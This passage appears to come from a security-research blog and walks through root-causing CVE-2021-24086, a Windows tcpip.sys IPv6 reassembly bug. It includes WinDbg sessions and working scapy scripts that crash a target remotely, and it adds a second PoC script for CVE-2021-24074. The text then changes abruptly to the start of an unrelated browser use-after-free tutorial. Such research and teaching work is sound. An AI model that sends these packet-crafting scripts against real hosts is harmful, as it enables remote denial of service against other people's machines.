  UnfragmentableLength = LOWORD(Packet->NetworkLayerHeaderSize) - 48;
  Reassembly->UnfragmentableLength = UnfragmentableLength;
  if ( UnfragmentableLength )
  {
    UnfragmentableData = ExAllocatePoolWithTagPriority(
      (POOL_TYPE)512,
      UnfragmentableLength,
      'erPI',
      LowPoolPriority
    );
    Reassembly->UnfragmentableData = UnfragmentableData;
    if ( !UnfragmentableData )
    {
      // ...
      goto Bail_0;
    }
    // ...
    // Copy the unfragmentable part of the packet inside the pool
    // buffer that we have allocated.
    RtlCopyMdlToBuffer(
      FirstNetBuffer->MdlChain,
      FirstNetBuffer->DataOffset - Packet->NetworkLayerHeaderSize + 0x28,
      Reassembly->UnfragmentableData,
      Reassembly->UnfragmentableLength,
      v51);
    NextHeaderOffset = Packet->NextHeaderPosition;
  }
  Reassembly->NextHeaderOffset = NextHeaderOffset;
  *(_QWORD *)&Reassembly->Ipv6 = *(_QWORD *)Packet->Ipv6Hdr;
}

3 - The fragment is then added into the Reassembly as part of a group of fragments by IppReassemblyInsertFragment. On top of that, if we have received every fragment necessary to start a reassembly, the function Ipv6pReassembleDatagram is invoked. Remember this guy? This is the function that has been patched and that we hit earlier in the post. But this time, we understand how we got there.

At this stage we have an OK understanding of the data structures involved to keep track of groups of fragments and how/when reassembly gets kicked off. We've also commented and refined various structure fields that we lifted early in the process; this is very helpful because now we can understand the fix for the vulnerability:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  //...
  UnfragmentableLength = Reassembly->UnfragmentableLength;
  TotalLength = UnfragmentableLength + Reassembly->DataLength;
  HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // Below is the added code by the patch
  if ( TotalLength > 0xFFF ) {
      // Bail
  }

How cool is that? That's really rewarding. Putting in a bunch of work that may feel not that useful at the time, but eventually adds up, snow-balls and really moves the needle forward. It's just a slow process and you gotta get used to it; that's just how the sausage is made.

Let's not get ahead of ourselves though, the emotional rollercoaster is right around the corner :)

Hiding in plain sight

All right - at this point I think we are done with zooming out and understanding the big picture. We understand the beast well enough to start getting back on this BSoD. After reading Ipv6pReassembleDatagram a few times I honestly couldn't figure out where the advertised crash could happen. Pretty frustrating. That is why I decided instead to use the debugger to modify Reassembly->DataLength and UnfragmentableLength at runtime to see if this could give me any hints. The first one didn't seem to do anything, but the second one bug-checked the machine with a NULL dereference, bingo that is looking good!

After carefully analyzing the crash I've started to realize that the potential issue has been hiding in plain sight in front of my eyes; here is the code:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  const uint32_t HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // …
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
                                        IppReassemblyNetBufferListsComplete,
                                        Reassembly,
                                        0i64,
                                        0i64,
                                        0,
                                        0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  Buffer = (ipv6_header_t *)NdisGetDataBuffer(FirstNetBuffer, HeaderAndOptionsLength, 0i64, 1u, 0);
  //...
  *Buffer = Reassembly->Ipv6;

NetioAllocateAndReferenceNetBufferAndNetBufferList allocates a brand new NBL called NetBufferList. Then NetioRetreatNetBuffer is called:

NDIS_STATUS NetioRetreatNetBuffer(_NET_BUFFER *Nb, ULONG Amount, ULONG DataBackFill)
{
  const uint32_t CurrentMdlOffset = Nb->CurrentMdlOffset;
  if ( CurrentMdlOffset < Amount )
    return NdisRetreatNetBufferDataStart(Nb, Amount, DataBackFill, NetioAllocateMdl);
  Nb->DataOffset -= Amount;
  Nb->DataLength += Amount;
  Nb->CurrentMdlOffset = CurrentMdlOffset - Amount;
  return 0;
}

Because the FirstNetBuffer just got allocated, it is empty and most of its fields are zero. This means that NetioRetreatNetBuffer triggers a call to NdisRetreatNetBufferDataStart which is publicly documented. According to the documentation, it should allocate an MDL using NetioAllocateMdl as the network buffer is empty as we mentioned above. One thing to notice is that the amount of bytes, HeaderAndOptionsLength, passed to NetioRetreatNetBuffer is truncated to a uint16_t; odd.

  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )

Now that there is backing space in the NB for the IPv6 header as well as the unfragmentable part of the packet, it needs to get a pointer to the backing data in order to populate the buffer. NdisGetDataBuffer is documented as to gain access to a contiguous block of data from a NET_BUFFER structure. After reading the documentation several time, it was a little bit confusing to me so I figured I'd throw NDIS in IDA and have a look at the implementation:

PVOID NdisGetDataBuffer(PNET_BUFFER NetBuffer, ULONG BytesNeeded, PVOID Storage, UINT AlignMultiple, UINT AlignOffset)
{
  const _MDL *CurrentMdl = NetBuffer->CurrentMdl;
  if ( !BytesNeeded || !CurrentMdl || NetBuffer->DataLength < BytesNeeded )
    return 0i64;
// ...

Just looking at the beginning of the implementation something stands out. As NdisGetDataBuffer is called with HeaderAndOptionsLength (not truncated), we should be able to hit the following condition NetBuffer->DataLength < BytesNeeded when HeaderAndOptionsLength is larger than 0xffff. Why, you ask? Let's take an example. HeaderAndOptionsLength is 0x1337, so NetioRetreatNetBuffer allocates a backing buffer of 0x1337 bytes, and NdisGetDataBuffer returns a pointer to the newly allocated data; works as expected. Now let's imagine that HeaderAndOptionsLength is 0x31337. This means that NetioRetreatNetBuffer allocates 0x1337 (because of the truncation) bytes but calls NdisGetDataBuffer with 0x31337 which makes the call fail because the network buffer is not big enough and we hit this condition NetBuffer->DataLength < BytesNeeded.

As the returned pointer is trusted not to be NULL, Ipv6pReassembleDatagram carries on by using it for a memory write:

  *Buffer = Reassembly->Ipv6;

This is where it should bugcheck. As usual we can verify our understanding of the function with a WinDbg session. Here is a simple Python script that sends two fragments:

from scapy.all import *
id = 0xdeadbeef
first = Ether() \
    / IPv6(dst = 'ff02::1') \
    / IPv6ExtHdrFragment(id = id, m = 1, offset = 0) \
    / UDP(sport = 0x1122, dport = 0x3344) \
    / '---frag1'
second = Ether() \
    / IPv6(dst = 'ff02::1') \
    / IPv6ExtHdrFragment(id = id, m = 0, offset = 2) \
    / '---frag2'
sendp([first, second], iface='eth1')

Let's see what the reassembly looks like when those packets are received:

kd> bp tcpip!Ipv6pReassembleDatagram

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff800`117cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> p
tcpip!Ipv6pReassembleDatagram+0x5:
fffff800`117cdd71 48894c2408      mov     qword ptr [rsp+8],rcx

// ...

kd> 
tcpip!Ipv6pReassembleDatagram+0x9c:
fffff800`117cde08 48ff1569660700  call    qword ptr [tcpip!_imp_NetioAllocateAndReferenceNetBufferAndNetBufferList (fffff800`11844478)]

kd> 
tcpip!Ipv6pReassembleDatagram+0xa3:
fffff800`117cde0f 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=ffffc107f7be1d90 <- this is the allocated NBL

kd> !ndiskd.nbl @rax
    NBL                ffffc107f7be1d90    Next NBL           NULL
    First NB           ffffc107f7be1f10    Source             NULL
                                           Pool               ffffc107f58ba980 - NETIO
    Flags              NBL_ALLOCATED

    Walk the NBL chain                     Dump data payload
    Show out-of-band information           Display as Wireshark hex dump


; The first NB is empty; its length is 0 as expected

kd> !ndiskd.nb ffffc107f7be1f10
    NB                 ffffc107f7be1f10    Next NB            NULL
    Length             0                   Source pool        ffffc107f58ba980
    First MDL          0                   DataOffset         0
    Current MDL        [NULL]              Current MDL offset 0

    View associated NBL

// ...

kd> r @rcx, @rdx
rcx=ffffc107f7be1f10 rdx=0000000000000028 <- the first NB and the size to allocate for it

kd>
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff800`117cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff800`11691354)

kd> p
tcpip!Ipv6pReassembleDatagram+0xde:
fffff800`117cde4a 85c0            test    eax,eax

; The first NB now has 0x28 bytes backing MDL

kd> !ndiskd.nb ffffc107f7be1f10
    NB                 ffffc107f7be1f10    Next NB            NULL
    Length             0n40                Source pool        ffffc107f58ba980
    First MDL          ffffc107f5ee8040    DataOffset         0n56
    Current MDL        [First MDL]         Current MDL offset 0n56

    View associated NBL

// ...

; Getting access to the backing buffer

kd> 
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff800`117cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff800`11844178)]

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff800`117cde71 0f1f440000      nop     dword ptr [rax+rax]

; This is the backing buffer; it has leftover data, but gets initialized later

kd> db @rax
ffffc107`f5ee80b0  05 02 00 00 01 00 8f 00-41 dc 00 00 00 01 04 00  ........A.......

All right, so it sounds like we have a plan - let's get to work.

Manufacturing a packet of the death: chasing phantoms

Well... sending a packet with a large header should be trivial right? That's initially what I thought. After trying various things to achieve this goal, I quickly realized it wouldn't be that easy. The main issue is the MTU. Basically, network devices don't allow you to send packets bigger than like ~1200 bytes. Online content suggests that some ethernet cards and network switches allow you to bump this limit. Because I was running my test in my own Hyper-V lab, I figured it was fair enough to try to reproduce the NULL dereference with non-default parameters, so I looked for a way to increase the MTU on the virtual switch to 64k.

The issue with that is that Hyper-V didn't allow me to do that. The only parameter I found allowed me to bump the limit to about 9k which is very far from the 64k I needed to trigger this issue. At this point, I felt frustrated because I felt I was so close to the end, but no cigar. Even though I had read that this vulnerability could be thrown over the internet, I kept going in this wrong direction. If it could be thrown from the internet, it meant it had to go through regular network equipment and there was no way a 64k packet would work. But I ignored this hard truth for a bit of time.

Eventually, I accepted the fact that I was probably heading the wrong direction, ugh. So I reevaluated my options. I figured that the bugcheck I triggered above was not the one that I would be able to trigger with packets thrown from the Internet. Maybe though there might be another code-path having a very similar pattern (retreat + NdisGetDataBuffer) that would result in a bugcheck. I've noticed that the TotalLength field is also truncated a bit further down in the function and written in the IPv6 header of the packet. This header is eventually copied in the final reassembled IPv6 header:

// The ROR2 is basically htons.
// One weird thing here is that TotalLength is truncated to 16b.
// We are able to make TotalLength >= 0x10000 by crafting a large
// packet via fragmentation.
// The issue with that is that, the size from the IPv6 header is smaller than
// the real total size. It's kinda hard to see how this would cause subsequent
// issue but hmm, yeah.
Reassembly->Ipv6.length = __ROR2__(TotalLength, 8);
// B00m, Buffer can be NULL here because of the issue discussed above.
// This copies the saved IPv6 header from the first fragment into the
// first part of the reassembled packet.
*Buffer = Reassembly->Ipv6;

My theory was that there might be some code that would read this Ipv6.length (which is truncated as __ROR2__ expects a uint16_t) and something bad might happen as a result. Although, the length would end up having a smaller value than the actual real size of the packet; it was hard for me to come up with a scenario where this would cause an issue but I still chased this theory as this was the only thing I had.

What I started to do at this point is to audit every demuxer that we saw earlier. I looked for ones that would use this length field somehow and looked for similar retreat / NdisGetDataBuffer patterns. Nothing. Thinking I might be missing something statically so I also heavily used WinDbg to verify my work. I used hardware breakpoints to track access to those two bytes but no hit. Ever. Frustrating.

After trying and trying I started to think that I might have been headed in the wrong direction again. Maybe, I really need to find a way to send such a large packet without violating the MTU. But how?

Manufacturing a packet of the death: leap of faith

All right so I decided to start fresh again. Going back to the big picture, I've studied a bit more the reassembly algorithm, diffed again just in case I missed a clue somewhere, but nothing...

Could I maybe be able to fragment a packet that has a very large header and trick the stack into reassembling the reassembled packet? We've seen previously that we could use reassembly as a primitive to stitch fragments together; so instead of trying to send a very large fragment maybe we could break down a large one into smaller ones and have them stitched together in memory. It honestly felt like a long leap forward, but based on my reverse-engineering effort I didn't really see anything that would prevent that. The idea was blurry but felt like it was worth a shot. How would it really work though?

Sitting down for a minute, this is the theory that I came up with. I created a very large fragment that has many headers; enough to trigger the bug assuming I could trigger another reassembly. Then, I fragmented this fragment so that it can be sent to the target without violating the MTU.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xff)),
        PadN(optdata=('c'*0xff)),
        PadN(optdata=('d'*0xff)),
        PadN(optdata=('e'*0xff)),
        PadN(optdata=('f'*0xff)),
        PadN(optdata=('0'*0xff)),
    ]) \
    # ....
    / IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xa0)),
    ]) \
    / IPv6ExtHdrFragment(
        id = second_pkt_id, m = 1,
        nh = 17, offset = 0
    ) \
    / UDP(dport = 31337, sport = 31337, chksum=0x7e7f)

reassembled_pkt = bytes(reassembled_pkt)
frags = frag6(args.target, frag_id, reassembled_pkt, 60)

The reassembly happens and tcpip.sys builds this huge reassembled fragment in memory; that's great as I didn't think it would work. Here is what it looks like in WinDbg:

kd> bp tcpip+01ADF71 ".echo Reassembled NB; r @r14;"

kd> g
Reassembled NB
r14=ffff800fa2a46f10
tcpip!Ipv6pReassembleDatagram+0x205:
fffff801`0a7cdf71 41394618        cmp     dword ptr [r14+18h],eax

kd> !ndiskd.nb @r14
    NB                 ffff800fa2a46f10    Next NB            NULL
    Length                10020            Source pool        ffff800fa06ba240
    First MDL          ffff800fa0eb1180    DataOffset         0n56
    Current MDL        [First MDL]         Current MDL offset 0n56

    View associated NBL

kd> !ndiskd.nbl ffff800fa2a46d90
    NBL                ffff800fa2a46d90    Next NBL           NULL
    First NB           ffff800fa2a46f10    Source             NULL
                                           Pool               ffff800fa06ba240 - NETIO
    Flags              NBL_ALLOCATED

    Walk the NBL chain                     Dump data payload
    Show out-of-band information           Display as Wireshark hex dump

kd> !ndiskd.nbl ffff800fa2a46d90 -data
NET_BUFFER ffff800fa2a46f10
  MDL ffff800fa0eb1180
    ffff800fa0eb11f0  60 00 00 00 ff f8 3c 40-fe 80 00 00 00 00 00 00  `·····<@········
    ffff800fa0eb1200  02 15 5d ff fe e4 30 0e-ff 02 00 00 00 00 00 00  ··]···0·········
    ffff800fa0eb1210  00 00 00 00 00 00 00 01                          ········

  ...

  MDL ffff800f9ff5e8b0
    ffff800f9ff5e8f0  3c e1 01 ff 61 61 61 61-61 61 61 61 61 61 61 61  <···aaaaaaaaaaaa
    ffff800f9ff5e900  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e910  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e920  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e930  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e940  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e950  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e960  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa

  ...

  MDL ffff800fa0937280
    ffff800fa09372c0  7a 69 7a 69 00 08 7e 7f                          zizi··~·

What we see above is the reassembled first fragment.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xff)),
        PadN(optdata=('c'*0xff)),
        PadN(optdata=('d'*0xff)),
        PadN(optdata=('e'*0xff)),
        PadN(optdata=('f'*0xff)),
        PadN(optdata=('0'*0xff)),
    ]) \
    # ...
    / IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xa0)),
    ]) \
    / IPv6ExtHdrFragment(
        id = second_pkt_id, m = 1,
        nh = 17, offset = 0
    ) \
    / UDP(dport = 31337, sport = 31337, chksum=0x7e7f)

It is a fragment that is 10020 bytes long, and you can see that the ndiskd extension walks the long MDL chain that describes the content of this fragment. The last MDL is the header of the UDP part of the fragment. What is left to do is to trigger another reassembly. What if we send another fragment that is part of the same group; would this trigger another reassembly?

Well, let's see if the below works I guess:

reassembled_pkt_2 = Ether() \
    / IPv6(dst = args.target) \
    / IPv6ExtHdrFragment(id = second_pkt_id, m = 0, offset = 1, nh = 17) \
    / 'doar-e ftw'

sendp(reassembled_pkt_2, iface = args.iface)

Here is what we see in WinDbg:

kd> bp tcpip!Ipv6pReassembleDatagram

; This is the first reassembly; the output packet is the first large fragment

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff805`4a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

; This is the second reassembly; it combines the first very large fragment, and the second fragment we just sent

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff805`4a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

...

; Let's see the bug happen live!

kd> 
tcpip!Ipv6pReassembleDatagram+0xce:
fffff805`4a5cde3a 0fb79424a8000000 movzx   edx,word ptr [rsp+0A8h]

kd> 
tcpip!Ipv6pReassembleDatagram+0xd6:
fffff805`4a5cde42 498bce          mov     rcx,r14

kd> 
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff805`4a5cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff805`4a491354)

kd> r @edx
edx=10 <- truncated size

// ...

kd> 
tcpip!Ipv6pReassembleDatagram+0xe6:
fffff805`4a5cde52 8b9424a8000000  mov     edx,dword ptr [rsp+0A8h]

kd> 
tcpip!Ipv6pReassembleDatagram+0xed:
fffff805`4a5cde59 41b901000000    mov     r9d,1

kd> 
tcpip!Ipv6pReassembleDatagram+0xf3:
fffff805`4a5cde5f 8364242000      and     dword ptr [rsp+20h],0

kd> 
tcpip!Ipv6pReassembleDatagram+0xf8:
fffff805`4a5cde64 4533c0          xor     r8d,r8d

kd> 
tcpip!Ipv6pReassembleDatagram+0xfb:
fffff805`4a5cde67 498bce          mov     rcx,r14

kd> 
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff805`4a5cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff805`4a644178)]

kd> r @rdx
rdx=0000000000010010 <- non truncated size

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff805`4a5cde71 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=0000000000000000 <- NdisGetDataBuffer returned NULL!!!

kd> g
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
                       (0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805`473c46a0 cc              int     3

kd> kc
 # Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
07 tcpip!Ipv6pReceiveFragment
08 tcpip!Ipv6pReceiveFragmentList
09 tcpip!IppReceiveHeaderBatch
0a tcpip!IppFlcReceivePacketsCore
0b tcpip!IpFlcReceivePackets
0c tcpip!FlpReceiveNonPreValidatedNetBufferListChain
0d tcpip!FlReceiveNetBufferListChainCalloutRoutine
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
10 tcpip!FlReceiveNetBufferListChain
11 NDIS!ndisMIndicateNetBufferListsToOpen
12 NDIS!ndisMTopReceiveNetBufferLists
13 NDIS!ndisCallReceiveHandler
14 NDIS!ndisInvokeNextReceiveHandler
15 NDIS!NdisMIndicateReceiveNetBufferLists
16 netvsc!ReceivePacketMessage
17 netvsc!NvscKmclProcessPacket
18 nt!KiInitializeKernel
19 nt!KiSystemStartup

Incredible! We managed to implement the recursive fragmentation idea we discussed. Wow, I really didn't think it would actually work. Morale of the day: don't leave any rocks unturned, follow your intuitions and reach the state of no unknowns.

Conclusion

In this post I tried to take you with me through my journey to write a PoC for CVE-2021-24086, a true remote DoS vulnerability affecting Windows' tcpip.sys driver found by Microsoft own's @piazzt. From zero to remote BSoD. The PoC is available on my github here: 0vercl0k/CVE-2021-24086.

It was a wild ride mainly because it all looked way too easy and because I ended up chasing a bunch of ghosts.

I am sure that I've lost about 99% of my readers as it is a fairly long and hairy post, but if you made it all the way there you should join and come hang in the newly created Diary of a reverse-engineer Discord: https://discord.gg/4JBWKDNyYs. We're trying to build a community of people enjoying low level subjects. Hopefully we can also generate more interest for external contributions :)

Last but not least, special greets to the usual suspects: @yrp604 and @__x86 and @jonathansalwan for proof-reading this article.

Bonus: CVE-2021-24074

Here is the Poc I built based on the high quality blogpost put out by Armis:

# Axel '0vercl0k' Souchet - April 4 2021
# Extremely detailed root-cause analysis was made by Armis:
# https://www.armis.com/resources/iot-security-blog/from-urgent-11-to-frag-44-microsoft-patches-critical-vulnerabilities-in-windows-tcp-ip-stack/
from scapy.all import *
import argparse
import codecs
import random

def trigger(args):
    '''
    kd> g
    oob?
    tcpip!Ipv4pReceiveRoutingHeader+0x16a:
    fffff804`453c6f7a 4d8d2c1c        lea     r13,[r12+rbx]
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x16e:
    fffff804`453c6f7e 498bd5          mov     rdx,r13
    kd> db @r13
    ffffb90e`85b78220  c0 82 b7 85 0e b9 ff ff-38 00 04 10 00 00 00 00  ........8.......
    kd> dqs @r13 l1
    ffffb90e`85b78220  ffffb90e`85b782c0
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x171:
    fffff804`453c6f81 488d0d58830500  lea     rcx,[tcpip!Ipv4Global (fffff804`4541f2e0)]
    kd>
    tcpip!Ipv4pReceiveRoutingHeader+0x178:
    fffff804`453c6f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804`453b5164)
    kd> db @rdx
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x17d:
    fffff804`453c6f8d 84c0            test    al,al
    kd> r.
    al=00000000`00000000  al=00000000`00000000
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x17f:
    fffff804`453c6f8f 0f85de040000    jne     tcpip!Ipv4pReceiveRoutingHeader+0x663 (fffff804`453c7473)
    kd>
    tcpip!Ipv4pReceiveRoutingHeader+0x185:
    fffff804`453c6f95 498bcd          mov     rcx,r13
    kd>
    Breakpoint 3 hit
    tcpip!Ipv4pReceiveRoutingHeader+0x188:
    fffff804`453c6f98 e8e7dff8ff      call    tcpip!Ipv4UnicastAddressScope (fffff804`45354f84)
    kd> dqs @rcx l1
    ffffb90e`85b78220  ffffb90e`85b782c0

    Call-stack (skip first hit):
      kd> kc
      # Call Site
      00 tcpip!Ipv4pReceiveRoutingHeader
      01 tcpip!IppReceiveHeaderBatch
      02 tcpip!Ipv4pReassembleDatagram
      03 tcpip!Ipv4pReceiveFragment
      04 tcpip!Ipv4pReceiveFragmentList
      05 tcpip!IppReceiveHeaderBatch
      06 tcpip!IppFlcReceivePacketsCore
      07 tcpip!IpFlcReceivePackets
      08 tcpip!FlpReceiveNonPreValidatedNetBufferListChain
      09 tcpip!FlReceiveNetBufferListChainCalloutRoutine
      0a nt!KeExpandKernelStackAndCalloutInternal
      0b nt!KeExpandKernelStackAndCalloutEx
      0c tcpip!FlReceiveNetBufferListChain

    Snippet:
      __int16 __fastcall Ipv4pReceiveRoutingHeader(Packet_t *Packet)
      {
        // ...
        // kd> db @rax
        // ffffdc07`ff209170  ff ff 04 00 61 62 63 00-54 24 30 48 89 14 01 48  ....abc.T$0H...H
        RoutingHeaderFirst = NdisGetDataBuffer(FirstNetBuffer, Packet->RoutingHeaderOptionLength, &v50[0].qw2, 1u, 0);
        NetioAdvanceNetBufferList(NetBufferList, v8);
        OptionLenFirst = RoutingHeaderFirst[1];
        LenghtOptionFirstMinusOne = (unsigned int)(unsigned __int8)RoutingHeaderFirst[2] - 1;
        RoutingOptionOffset = LOBYTE(Packet->RoutingOptionOffset);
        if (OptionLenFirst < 7u ||
          LenghtOptionFirstMinusOne > OptionLenFirst - sizeof(IN_ADDR))
        {
          // ...
          goto Bail_0;
        }
        // ...
    '''
    id = random.randint(0, 0xff)
    # dst_ip isn't a broadcast IP because otherwise we fail a check in
    # Ipv4pReceiveRoutingHeader; if we don't take the below branch
    # we don't hit the interesting bits later:
    #   if (Packet->CurrentDestinationType == NlatUnicast) {
    #     v12 = &RoutingHeaderFirst[LenghtOptionFirstMinusOne];
    dst_ip = '192.168.2.137'
    src_ip = '120.120.120.0'
    # UDP
    nh = 17
    content = bytes(UDP(sport = 31337, dport = 31338) / '1')
    one = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 1,
            proto = nh,
            frag = 0,
            id = id,
            options = [IPOption_Security(
                length = 0xb,
                security = 0x11,
                # This is used for as an ~upper bound in Ipv4pReceiveRoutingHeader:
                compartment = 0xffff,
                # This is the offset that allows us to index out of the
                # bounds of the second fragment.
                # Keep in mind that, the out of bounds data is first used
                # before triggering any corruption (in Ipv4pReceiveRoutingHeader):
                #  - IppIsInvalidSourceAddressStrict,
                #  - Ipv4UnicastAddressScope.
                # if (IppIsInvalidSourceAddressStrict(Ipv4Global, &RoutingHeaderFirst[LenghtOptionFirstMinusOne])
                #     || (Ipv4UnicastAddressScope(&RoutingHeaderFirst[LenghtOptionFirstMinusOne]),
                #         v13 = Ipv4UnicastAddressScope(&Packet->RoutingOptionSourceIp),
                #         v14 < v13) )
                # The upper byte of handling_restrictions is `RoutingHeaderFirst[2]` in the above snippet
                # Offset of 6 allows us to have &RoutingHeaderFirst[LenghtOptionFirstMinusOne] pointing on
                # one.IP.options.transmission_control_code; last byte is OOB.
                #   kd>
                #   tcpip!Ipv4pReceiveRoutingHeader+0x178:
                #   fffff804`5c076f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804`5c065164)
                #   kd> db @rdx
                #   ffffdc07`ff209175  62 63 00 54 24 30 48 89-14 01 48 c0 92 20 ff 07  bc.T$0H...H.. ..
                #                                ^
                #                                |_ oob
                handling_restrictions = (6 << 8),
                transmission_control_code = b'\x11\xc1\xa8'
            )]
        ) / content[: 8]
    two = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 0,
            proto = nh,
            frag = 1,
            id = id,
            options = [
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_LSRR(
                    pointer = 0x8,
                    routers = ['11.22.33.44']
                ),
            ]
        ) / content[8: ]

    sendp([one, two], iface='eth1')

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('--target', default = 'ff02::1')
    parser.add_argument('--dport', default = 500)
    args = parser.parse_args()
    trigger(args)
    return

if __name__ == '__main__':
    main()

Exploit Development: Browser Exploitation on Windows - Understanding Use-After-Free Vulnerabilities

Connor McGarr

21 April 2021 at 00:00

Introduction

Browser exploitation is a topic that has been incredibly daunting for myself. Looking back at my journey over the past year and a half or so since I started to dive into binary exploitation, specifically on Windows, I remember experiencing this same feeling with kernel exploitation. I can still remember one day just waking up and realizing that I just need to just dive into it if I ever wanted to advance my knowledge. Looking back, although I still have tons to learn about it and am still a novice at kernel exploitation, I realized it was my will to just jump in, irrespective of the difficulty level, that helped me to eventually grasp some of the concepts surrounding more modern kernel exploitation.

Browser exploitation has always been another fear of mine, even more so than the Windows kernel, due to the fact not only do you need to understand overarching exploit primitives and vulnerability classes that are specific to Windows, but also needing to understand other topics such as the different JavaScript engines, just-in-time (JIT) compilers, and a plethora of other subjects, which by themselves are difficult (at least to me) to understand. Plus, the addition of browser specific mitigations is also something that has been a determining factor in myself putting off learning this subject.

What has always been frightening, is the lack (in my estimation) of resources surrounding browser exploitation on Windows. Many people can just dissect a piece of code and come up with a working exploit within a few hours. This is not the case for myself. The way I learn is to take a POC, along with an accompanying blog, and walk through the code in a debugger. From there I analyze everything that is going on and try to ask myself the question “Why did the author feel it was important to mention X concept or show Y snippet of code?”, and to also attempt to answer that question. In addition to that, I try to first arm myself with the prerequisite knowledge to even begin the exploitation process (e.g. “The author mentioned this is a result of a fake virtual function table. What is a virtual function table in the first place?”). This helps me to understand the underlying concepts. From there, I am able to take other POCs that leverage the same vulnerability classes and weaponize them - but it takes that first initial walkthrough for myself.

Since this is my learning style, I have found that blogs on Windows browser exploitation which start from the beginning are very sparse. Since I use blogging as a mechanism not only to share what I know, but to reinforce the concepts I am attempting to hit home, I thought I would take a few months, now with Advanced Windows Exploitation (AWE) being canceled again for 2021, to research browser exploitation on Windows and to talk about it.

Please note that what is going to be demonstrated here, is not heap spraying as an execution method. These will be actual vulnerabilities that are exploited. However, it should also be noted that this will start out on Internet Explorer 8, on Windows 7 x86. We will still outline leveraging code-reuse techniques to bypass DEP, but don’t expect MemGC, Delay Free, etc. to be enabled for this tutorial, and most likely for the next few. This will simply be a documentation of my thought process, should you care, of how I went from crash to vulnerability identification, and hopefully to a shell in the end.

Understanding Use-After-Free Vulnerabilities

